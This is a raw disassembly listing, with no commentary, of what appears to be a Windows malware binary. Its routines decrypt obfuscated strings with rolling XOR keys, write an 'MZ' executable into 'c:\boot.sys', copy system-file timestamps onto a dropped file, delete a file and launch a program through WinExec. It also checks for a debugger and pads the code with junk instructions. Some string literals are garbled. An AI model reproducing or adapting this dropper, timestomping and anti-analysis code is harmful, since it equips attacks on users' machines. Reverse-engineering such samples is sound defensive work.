mov [ebp+var_4], 0
call sub_40C9C8 ; GetTickCount
loc_407FB5: ; CODE XREF: sub_407F79+6F�j
; sub_407F79+9A�j
call sub_40C944 ; GetCurrentThreadId
mov edi, dword_4423B4
add edi, 1E9h
push edi
call sub_40CDDC
add esp, 4
mov [ebp+var_1B], 98h
add [ebp+var_1B], 0ABh
call sub_406EA8
call sub_40C944 ; GetCurrentThreadId
cmp dword_4423BC, 0
jnz short loc_407FB5
jmp short loc_40801C
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40801C
; ---------------------------------------------------------------------------
mov [ebp+var_20], 1
mov eax, [ebp+var_20]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
lea edi, [ebp+var_21]
lea esi, byte_44244A
mov ecx, 1
rep movsb
jmp short loc_407FB5
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_40801C: ; CODE XREF: sub_407F79+71�j
; sub_407F79+7A�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
sub_407F79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40802E proc near ; CODE XREF: sub_40AB84+78C�p
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_40C938 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
mov ds:dword_40F268, eax
call sub_40C938 ; GetCurrentProcessId
push offset dword_4423BC
push 0
push 0
push offset sub_407F79
push 0
push 0
call sub_40CB84 ; CreateThread
mov ebx, eax
call sub_40C9C8 ; GetTickCount
push ebx
call sub_40C9B0 ; CloseHandle
lea edi, [ebp+var_3]
lea esi, byte_442457
mov ecx, 3
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_40802E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
call sub_40C998 ; GetProcessHeap
cmp dword_442370, 0
jnz short loc_408096
xor eax, eax
jmp short loc_4080DF
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: .text:00408090�j
call sub_40C9D4 ; GetVersion
mov eax, ds:dword_42FD54
cmp [ebp+8], eax
jz short loc_4080A9
xor eax, eax
jmp short loc_4080DF
; ---------------------------------------------------------------------------
loc_4080A9: ; CODE XREF: .text:004080A3�j
mov edi, 4F41h
add edi, 2B7Dh
lea ecx, byte_41FD50
or eax, 0FFFFFFFFh
loc_4080BD: ; CODE XREF: .text:004080C2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4080BD
mov edi, eax
add edi, 1
push edi
push offset byte_41FD50
push dword ptr [ebp+0Ch]
call sub_40CE18
add esp, 0Ch
mov eax, 1
loc_4080DF: ; CODE XREF: .text:00408094�j
; .text:004080A7�j
pop edi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080E2 proc near ; CODE XREF: sub_408165+234�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_442464
lea eax, ds:4152F0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov [ebp+var_4], 2E0h
xor edi, edi
jmp short loc_408129
; ---------------------------------------------------------------------------
loc_40810F: ; CODE XREF: sub_4080E2+49�j
mov eax, dword_442464
add eax, edi
lea eax, ds:4152F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0EBh
mov [eax], dl
inc edi
loc_408129: ; CODE XREF: sub_4080E2+2B�j
cmp edi, esi
jl short loc_40810F
mov eax, dword_442464
add eax, esi
mov byte ptr ds:dword_4152F0[eax], 0
mov edi, dword_442464
mov eax, edi
lea eax, [eax+esi+2]
mov dword_442464, eax
cmp eax, 0DD0h
jle short loc_40815B
and dword_442464, 0
loc_40815B: ; CODE XREF: sub_4080E2+70�j
lea eax, dword_4152F0[edi]
pop edi
pop esi
leave
retn
sub_4080E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408165 proc near ; DATA XREF: sub_40AB84+787�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_16 = byte ptr -16h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
lea edi, [ebp+var_16]
lea esi, a61xo ; "61Xo+"
mov ecx, 3
rep movsw
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_10], 0
loc_40818B: ; CODE XREF: sub_408165+1B1�j
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ah
jnz loc_4082C2
call sub_40C998 ; GetProcessHeap
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [eax+edx+11h], 20h
jz short loc_4081B8
cmp byte ptr [eax+edx+14h], 20h
jnz loc_4082C2
loc_4081B8: ; CODE XREF: sub_408165+46�j
call sub_40C944 ; GetCurrentThreadId
mov eax, [ebp+var_4]
inc eax
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 34h
jz short loc_4081D3
cmp al, 35h
jnz loc_4082C2
loc_4081D3: ; CODE XREF: sub_408165+64�j
mov eax, [ebp+var_4]
add eax, 11h
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 20h
jnz short loc_4081EB
mov [ebp+var_8], 10h
jmp short loc_4081F2
; ---------------------------------------------------------------------------
loc_4081EB: ; CODE XREF: sub_408165+7B�j
mov [ebp+var_8], 13h
loc_4081F2: ; CODE XREF: sub_408165+84�j
mov [ebp+var_9], 0
xor ebx, ebx
jmp loc_408295
; ---------------------------------------------------------------------------
loc_4081FD: ; CODE XREF: sub_408165+133�j
call sub_40C968 ; RtlGetLastWin32Error
cmp [ebp+var_8], 13h
jnz short loc_40823E
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_40823E
mov edi, 5
mov esi, ebx
inc esi
mov [ebp+var_28], edi
mov eax, esi
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_2C], eax
mov eax, edi
mov edi, [ebp+var_2C]
mul [ebp+var_2C]
mov [ebp+var_30], eax
mov edi, eax
cmp edi, esi
jz short loc_408294
loc_40823E: ; CODE XREF: sub_408165+A1�j
; sub_408165+B0�j
lea edi, [ebp+var_24]
lea esi, a7kq ; "*7kq="
mov ecx, 3
rep movsw
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 30h
jl short loc_408263
cmp al, 39h
jle short loc_408265
loc_408263: ; CODE XREF: sub_408165+F8�j
jmp short loc_4082C2
; ---------------------------------------------------------------------------
loc_408265: ; CODE XREF: sub_408165+FC�j
mov [ebp+var_1E], 1753h
movzx eax, [ebp+var_1E]
imul eax, 4D86h
mov [ebp+var_1E], ax
movzx eax, [ebp+var_9]
mov edx, [ebp+var_4]
inc edx
add edx, ebx
mov ecx, [ebp+arg_0]
mov dl, [ecx+edx]
mov ds:byte_434080[eax], dl
add [ebp+var_9], 1
loc_408294: ; CODE XREF: sub_408165+D7�j
inc ebx
loc_408295: ; CODE XREF: sub_408165+93�j
cmp ebx, [ebp+var_8]
jb loc_4081FD
mov eax, [ebp+var_8]
mov ds:byte_434080[eax], 0
call sub_40132A
or eax, eax
jz short loc_4082B9
call sub_40C9C8 ; GetTickCount
jmp short loc_4082C2
; ---------------------------------------------------------------------------
loc_4082B9: ; CODE XREF: sub_408165+14B�j
mov [ebp+var_10], 1
jmp short loc_40831F
; ---------------------------------------------------------------------------
loc_4082C2: ; CODE XREF: sub_408165+30�j
; sub_408165+4D�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0
jz short loc_40831B
call sub_40C968 ; RtlGetLastWin32Error
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ch
jnz short loc_408305
cmp byte ptr [eax+edx+1], 46h
jnz short loc_408305
cmp byte ptr [eax+edx+2], 4Fh
jnz short loc_408305
cmp byte ptr [eax+edx+3], 52h
jnz short loc_408305
cmp byte ptr [eax+edx+4], 4Dh
jnz short loc_408305
cmp byte ptr [eax+edx+5], 5Fh
jz short loc_40831B
loc_408305: ; CODE XREF: sub_408165+17B�j
; sub_408165+182�j ...
lea edi, [ebp+var_1C]
lea esi, aEQbl ; "E;Qbl"
mov ecx, 3
rep movsw
jmp loc_40818B
; ---------------------------------------------------------------------------
loc_40831B: ; CODE XREF: sub_408165+16A�j
; sub_408165+19E�j
and [ebp+var_10], 0
loc_40831F: ; CODE XREF: sub_408165+15B�j
cmp [ebp+var_10], 0
jz short loc_408334
mov eax, ds:dword_42FD54
mov dword_43C220, eax
jmp loc_4083E1
; ---------------------------------------------------------------------------
loc_408334: ; CODE XREF: sub_408165+1BE�j
mov [ebp+var_24], 14DBh
add [ebp+var_24], 9CBh
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40E070
call sub_40CAD0 ; CreateFileA
mov [ebp-20h], eax
push 2
push 0
push 0
push eax
call sub_40CADC ; SetFilePointer
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_408372: ; CODE XREF: sub_408165+212�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408372
mov edi, eax
push 0
lea esi, [ebp+var_2C]
push esi
push edi
push [ebp+arg_0]
push dword ptr [ebp-20h]
call sub_40CB48 ; WriteFile
call sub_40C938 ; GetCurrentProcessId
push 2
push offset aCs ; ""
call sub_4080E2
add esp, 8
push 0
lea edi, [ebp+var_2C]
push edi
mov edi, 11h
sub edi, dword_442460
push edi
push eax
push dword ptr [ebp-20h]
call sub_40CB48 ; WriteFile
mov byte ptr [ebp+var_28+3], 3Fh
movzx eax, byte ptr [ebp+var_28+3]
imul eax, 73A6h
mov byte ptr [ebp+var_28+3], al
push dword ptr [ebp-20h]
call sub_40C9B0 ; CloseHandle
mov word ptr [ebp+var_28], 7A7Fh
sub word ptr [ebp+var_28], 7E05h
loc_4083E1: ; CODE XREF: sub_408165+1CA�j
pop edi
pop esi
pop ebx
leave
retn
sub_408165 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083E6 proc near ; CODE XREF: sub_408477+64�p
; sub_408585+C4�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_446484
lea eax, ds:40D000h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_408426
; ---------------------------------------------------------------------------
loc_40840C: ; CODE XREF: sub_4083E6+42�j
mov eax, dword_446484
add eax, edi
lea eax, ds:40D000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0E9h
mov [eax], dl
inc edi
loc_408426: ; CODE XREF: sub_4083E6+24�j
cmp edi, esi
jl short loc_40840C
mov eax, dword_446484
add eax, esi
mov byte ptr ds:dword_40D000[eax], 0
xor edi, edi
mov edi, dword_446484
mov eax, edi
lea eax, [eax+esi+1]
mov dword_446484, eax
add dword_446484, 3
cmp dword_446484, 0DE9h
jle short loc_408466
and dword_446484, 0
loc_408466: ; CODE XREF: sub_4083E6+77�j
mov [ebp+var_4], 13Eh
lea eax, dword_40D000[edi]
pop edi
pop esi
leave
retn
sub_4083E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408477 proc near ; CODE XREF: sub_408585+92�p
var_235 = word ptr -235h
var_233 = dword ptr -233h
var_22F = byte ptr -22Fh
var_227 = byte ptr -227h
var_21F = byte ptr -21Fh
var_217 = word ptr -217h
var_215 = byte ptr -215h
var_20D = word ptr -20Dh
var_20B = byte ptr -20Bh
var_106 = byte ptr -106h
var_105 = byte ptr -105h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
mov ax, word_446488
mov [ebp+var_20D], ax
lea edi, [ebp+var_215]
lea esi, aMcVdB ; "Mc d+B"
movsd
movsd
mov ax, word_446492
mov [ebp+var_217], ax
push 104h
lea eax, [ebp+var_20B]
push eax
call sub_40C9A4 ; GetSystemDirectoryA
lea eax, [ebp+var_20B]
push eax
lea eax, [ebp+var_105]
push eax
call sub_40C8DC
call sub_40C968 ; RtlGetLastWin32Error
push 0Dh
push offset aVmizmeNee ; "Ǎ"
call sub_4083E6
push eax
lea edi, [ebp+var_105]
push edi
call sub_40CE78
add esp, 10h
mov [ebp+var_106], 12h
add [ebp+var_106], 46h
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_105]
push eax
call sub_40CAD0 ; CreateFileA
mov ebx, eax
mov eax, dword_446494
mov [ebp+var_233], eax
cmp ebx, 0FFFFFFFFh
jz short loc_408580
call sub_40C9D4 ; GetVersion
lea eax, [ebp+var_22F]
push eax
lea eax, [ebp+var_227]
push eax
lea eax, [ebp+var_21F]
push eax
push ebx
call sub_40C95C ; GetFileTime
lea eax, [ebp+var_22F]
push eax
lea eax, [ebp+var_227]
push eax
lea eax, [ebp+var_21F]
push eax
push [ebp+arg_0]
call sub_40CAE8 ; SetFileTime
call sub_40C9C8 ; GetTickCount
push ebx
call sub_40C9B0 ; CloseHandle
mov ax, word_446498
mov [ebp+var_235], ax
loc_408580: ; CODE XREF: sub_408477+B2�j
pop edi
pop esi
pop ebx
leave
retn
sub_408477 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408585 proc near ; CODE XREF: sub_40AB84+91�p
var_225 = byte ptr -225h
var_220 = byte ptr -220h
var_21A = byte ptr -21Ah
var_116 = byte ptr -116h
var_10A = word ptr -10Ah
var_108 = word ptr -108h
var_106 = word ptr -106h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 228h
push ebx
push esi
push edi
mov [ebp+var_106], 5984h
movzx eax, [ebp+var_106]
imul eax, 3A02h
mov [ebp+var_106], ax
call sub_40C9D4 ; GetVersion
cmp eax, 80000000h
jnb loc_4086CF
call sub_40C938 ; GetCurrentProcessId
lea edi, [ebp+var_116]
lea esi, aCBoot_sys ; "c:\\boot.sys"
mov ecx, 3
rep movsd
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_116]
push eax
call sub_40CAD0 ; CreateFileA
mov ebx, eax
call sub_40C9C8 ; GetTickCount
push 0
lea eax, [ebp+var_220]
push eax
push 4001h
push offset aMzr ; "MZ"
push ebx
call sub_40CB48 ; WriteFile
call sub_40C998 ; GetProcessHeap
push ebx
call sub_408477
call sub_40C9C8 ; GetTickCount
push ebx
call sub_40C9B0 ; CloseHandle
call sub_40C944 ; GetCurrentThreadId
push 104h
lea eax, [ebp+var_104]
push eax
call sub_40C9A4 ; GetSystemDirectoryA
call sub_40C9D4 ; GetVersion
push 0Ah
push offset aKdnSap ; "̚Ǚ"
call sub_4083E6
lea edi, [ebp+var_104]
push edi
push eax
lea edi, [ebp+var_21A]
push edi
call sub_40CE54
mov [ebp+var_108], 3632h
add [ebp+var_108], 6660h
push 1Dh
push offset aKdnMsmKAiiaKLj ; "njƪɚɊӵǚ"
call sub_4083E6
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CE78
add esp, 28h
mov [ebp+var_10A], 7BA5h
add [ebp+var_10A], 41F4h
lea eax, [ebp+var_21A]
push eax
call sub_40C908 ; DeleteFileA
push 0
lea eax, [ebp+var_104]
push eax
call sub_40CB3C ; WinExec
lea edi, [ebp+var_225]
lea esi, aU09 ; "u0 9"
mov ecx, 5
rep movsb
loc_4086CF: ; CODE XREF: sub_408585+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_408585 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 37Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_446534
lea eax, ds:432FC0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_40871A
; ---------------------------------------------------------------------------
loc_408703: ; CODE XREF: .text:0040871C�j
mov eax, dword_446534
add eax, edi
lea eax, ds:432FC0h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Dh
mov [eax], dl
inc edi
loc_40871A: ; CODE XREF: .text:00408701�j
cmp edi, esi
jl short loc_408703
mov dword ptr [ebp-8], 0EFh
mov eax, dword_446534
add eax, esi
mov byte ptr ds:dword_432FC0[eax], 0
mov edi, dword_446534
add dword_446534, 2
mov eax, dword_446534
add eax, 2
add eax, esi
mov dword_446534, eax
cmp eax, 0DF1h
jle short loc_40875E
and dword_446534, 0
loc_40875E: ; CODE XREF: .text:00408755�j
mov dword ptr [ebp-0Ch], 2B9h
lea eax, dword_432FC0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40876F proc near ; CODE XREF: sub_408896+40�p
var_9 = byte ptr -9
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov ax, word_446538
mov [ebp+var_2], ax
push 4
push 1000h
push [ebp+arg_0]
push 0
call sub_40CB0C ; VirtualAlloc
jmp short loc_4087A4
; ---------------------------------------------------------------------------
lea edi, [ebp+var_9]
lea esi, aRgjf ; "~ rGjf"
mov ecx, 7
rep movsb
loc_4087A4: ; CODE XREF: sub_40876F+23�j
pop edi
pop esi
leave
retn
sub_40876F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087A8 proc near ; CODE XREF: sub_408896+C5�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_2], 4CBDh
inc [ebp+var_2]
push 8000h
push 0
push [ebp+arg_0]
call sub_40CB18 ; VirtualFree
jmp short locret_4087CC
; ---------------------------------------------------------------------------
call sub_40CA58 ; IsDebuggerPresent
locret_4087CC: ; CODE XREF: sub_4087A8+1D�j
leave
retn
sub_4087A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 39Dh
push esi
push dword ptr [ebp+8]
mov eax, dword_44654C
lea eax, ds:43A4B0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_408817
; ---------------------------------------------------------------------------
loc_4087FD: ; CODE XREF: .text:00408819�j
mov eax, dword_44654C
add eax, edi
lea eax, ds:43A4B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0AAh
mov [eax], dl
inc edi
loc_408817: ; CODE XREF: .text:004087FB�j
cmp edi, esi
jl short loc_4087FD
mov dword ptr [ebp-8], 0AEh
mov eax, dword_44654C
add eax, esi
mov byte ptr ds:dword_43A4B0[eax], 0
xor edi, edi
mov edi, dword_44654C
mov eax, edi
inc eax
add eax, esi
mov dword_44654C, eax
add dword_44654C, 2
cmp dword_44654C, 0DF5h
jle short loc_40885D
and dword_44654C, 0
loc_40885D: ; CODE XREF: .text:00408854�j
mov dword ptr [ebp-0Ch], 0DDh
lea eax, dword_43A4B0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40886E proc near ; CODE XREF: sub_408896+E1�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
call sub_40C998 ; GetProcessHeap
push offset dword_4464EC
push offset dword_4464AC
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BE84
mov [ebp+var_1], 81h
add [ebp+var_1], 1
leave
retn
sub_40886E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408896 proc near ; CODE XREF: sub_409A96+45E�p
var_62 = byte ptr -62h
var_5D = byte ptr -5Dh
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 64h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C998 ; GetProcessHeap
mov eax, dword_446550
mov [ebp+var_5C], eax
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_5D]
lea esi, byte_446554
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4088CD
add eax, 3Fh
loc_4088CD: ; CODE XREF: sub_408896+32�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_40876F
pop ecx
mov [ebp+var_18], eax
call sub_40C968 ; RtlGetLastWin32Error
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4088EF
add eax, 3Fh
loc_4088EF: ; CODE XREF: sub_408896+54�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
push [ebp+var_18]
call sub_40CAC4 ; RtlZeroMemory
call sub_40C944 ; GetCurrentThreadId
push [ebp+arg_4]
push ebx
push [ebp+var_18]
call sub_40CE18
add esp, 0Ch
call sub_40C9C8 ; GetTickCount
lea eax, [ebp+var_14]
push eax
call sub_40BFC2
mov ebx, [ebp+var_18]
and [ebp+var_4], 0
jmp short loc_408945
; ---------------------------------------------------------------------------
loc_40892B: ; CODE XREF: sub_408896+C0�j
call sub_40C944 ; GetCurrentThreadId
push ebx
lea eax, [ebp+var_14]
push eax
call sub_40BFE9
call sub_40C944 ; GetCurrentThreadId
add ebx, 40h
inc [ebp+var_4]
loc_408945: ; CODE XREF: sub_408896+93�j
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408950
add eax, 3Fh
loc_408950: ; CODE XREF: sub_408896+B5�j
sar eax, 6
cmp [ebp+var_4], eax
jl short loc_40892B
push [ebp+var_18]
call sub_4087A8
lea edi, [ebp+var_62]
lea esi, aE4Y ; "e4'Y"
mov ecx, 5
rep movsb
lea eax, [ebp+var_58]
push eax
push [ebp+arg_8]
call sub_40886E
mov eax, dword_446548
add eax, 3
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
call sub_40CE0C
add esp, 18h
or eax, eax
jz short loc_40899E
xor eax, eax
inc eax
jmp short loc_4089A0
; ---------------------------------------------------------------------------
loc_40899E: ; CODE XREF: sub_408896+101�j
xor eax, eax
loc_4089A0: ; CODE XREF: sub_408896+106�j
pop edi
pop esi
pop ebx
leave
retn
sub_408896 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_446564
lea eax, ds:4393D0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_4089E5
; ---------------------------------------------------------------------------
loc_4089CB: ; CODE XREF: .text:004089E7�j
mov eax, dword_446564
add eax, edi
lea eax, ds:4393D0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0CDh
mov [eax], dl
inc edi
loc_4089E5: ; CODE XREF: .text:004089C9�j
cmp edi, esi
jl short loc_4089CB
mov eax, dword_446564
add eax, esi
mov byte ptr ds:dword_4393D0[eax], 0
mov edi, dword_446564
inc dword_446564
mov eax, dword_446564
lea eax, [eax+esi+2]
mov dword_446564, eax
add dword_446564, 2
cmp dword_446564, 0DBBh
jle short loc_408A2C
and dword_446564, 0
loc_408A2C: ; CODE XREF: .text:00408A23�j
mov dword ptr [ebp-4], 29Eh
lea eax, dword_4393D0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A3D proc near ; CODE XREF: sub_409A96+3B9�p
; sub_409A96+3D6�p
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
call sub_40C9C8 ; GetTickCount
and [ebp+var_8], 0
and [ebp+var_C], 0
xor esi, esi
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_408B5F
; ---------------------------------------------------------------------------
loc_408A68: ; CODE XREF: sub_408A3D+12A�j
mov [ebp+var_E], 89h
movzx eax, [ebp+var_E]
imul eax, 6B4Ah
mov [ebp+var_E], al
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, dword_446568[edx]
mov [ebp+var_10], 1A8h
add [ebp+var_10], 201Fh
cmp esi, 0FFFFFFFFh
jz loc_408B5E
mov [ebp+var_12], 8D6h
movzx eax, [ebp+var_12]
imul eax, 3715h
mov [ebp+var_12], ax
mov eax, [ebp+var_8]
or eax, eax
jl loc_408B5B
cmp eax, 3
jg loc_408B5B
jmp off_446968[eax*4]
; ---------------------------------------------------------------------------
call sub_40C938 ; GetCurrentProcessId
loc_408ACF: ; CODE XREF: sub_408A3D+86�j
; DATA XREF: .data:off_446968�o
inc [ebp+var_8]
mov [ebp+var_1A], 3A72h
movzx eax, [ebp+var_1A]
imul eax, 3484h
mov [ebp+var_1A], ax
jmp short loc_408B5B
; ---------------------------------------------------------------------------
loc_408AE8: ; CODE XREF: sub_408A3D+86�j
; DATA XREF: .data:0044696C�o
mov edx, [ebp+var_C]
shl edx, 2
mov ecx, esi
and ecx, 30h
sar ecx, 4
or edx, ecx
mov [ebp+var_D], dl
mov [ebp+var_1B], 7Ch
movzx eax, [ebp+var_1B]
imul eax, 0FABh
mov [ebp+var_1B], al
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_408B5B
; ---------------------------------------------------------------------------
loc_408B19: ; CODE XREF: sub_408A3D+86�j
; DATA XREF: .data:00446970�o
mov edx, [ebp+var_C]
and edx, 0Fh
shl edx, 4
mov ecx, esi
and ecx, 3Ch
sar ecx, 2
or edx, ecx
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_408B5B
; ---------------------------------------------------------------------------
loc_408B3C: ; CODE XREF: sub_408A3D+86�j
; DATA XREF: .data:00446974�o
mov edx, [ebp+var_C]
and edx, 3
shl edx, 6
or edx, esi
mov [ebp+var_D], dl
call sub_40CA58 ; IsDebuggerPresent
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
and [ebp+var_8], 0
loc_408B5B: ; CODE XREF: sub_408A3D+77�j
; sub_408A3D+80�j ...
mov [ebp+var_C], esi
loc_408B5E: ; CODE XREF: sub_408A3D+58�j
inc edi
loc_408B5F: ; CODE XREF: sub_408A3D+26�j
cmp byte ptr [edi], 0
jz short loc_408B6D
cmp ebx, [ebp+var_4]
jb loc_408A68
loc_408B6D: ; CODE XREF: sub_408A3D+125�j
cmp byte ptr [edi], 0
jnz short loc_408B83
call sub_40C9D4 ; GetVersion
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_408B86
; ---------------------------------------------------------------------------
call sub_40C944 ; GetCurrentThreadId
loc_408B83: ; CODE XREF: sub_408A3D+133�j
or eax, 0FFFFFFFFh
loc_408B86: ; CODE XREF: sub_408A3D+13F�j
pop edi
pop esi
pop ebx
leave
retn
sub_408A3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B8B proc near ; CODE XREF: sub_408C17+7E�p
; sub_408C17+EC�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_446980
lea eax, ds:413E10h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_408BCB
; ---------------------------------------------------------------------------
loc_408BB1: ; CODE XREF: sub_408B8B+42�j
mov eax, dword_446980
add eax, edi
lea eax, ds:413E10h[eax]
movsx edx, byte ptr [eax]
xor edx, 94h
mov [eax], dl
inc edi
loc_408BCB: ; CODE XREF: sub_408B8B+24�j
cmp edi, esi
jl short loc_408BB1
mov eax, dword_446980
add eax, esi
mov byte ptr ds:dword_413E10[eax], 0
mov edi, dword_446980
inc dword_446980
mov eax, dword_446980
lea eax, [eax+esi+3]
mov dword_446980, eax
cmp eax, 0DDEh
jle short loc_408C06
and dword_446980, 0
loc_408C06: ; CODE XREF: sub_408B8B+72�j
mov [ebp+var_4], 121h
lea eax, dword_413E10[edi]
pop edi
pop esi
leave
retn
sub_408B8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C17 proc near ; CODE XREF: sub_409A96:loc_40AA0B�p
var_39D = dword ptr -39Dh
var_399 = byte ptr -399h
var_396 = word ptr -396h
var_394 = word ptr -394h
var_392 = word ptr -392h
var_390 = dword ptr -390h
var_389 = byte ptr -389h
var_383 = byte ptr -383h
var_37C = byte ptr -37Ch
var_377 = byte ptr -377h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
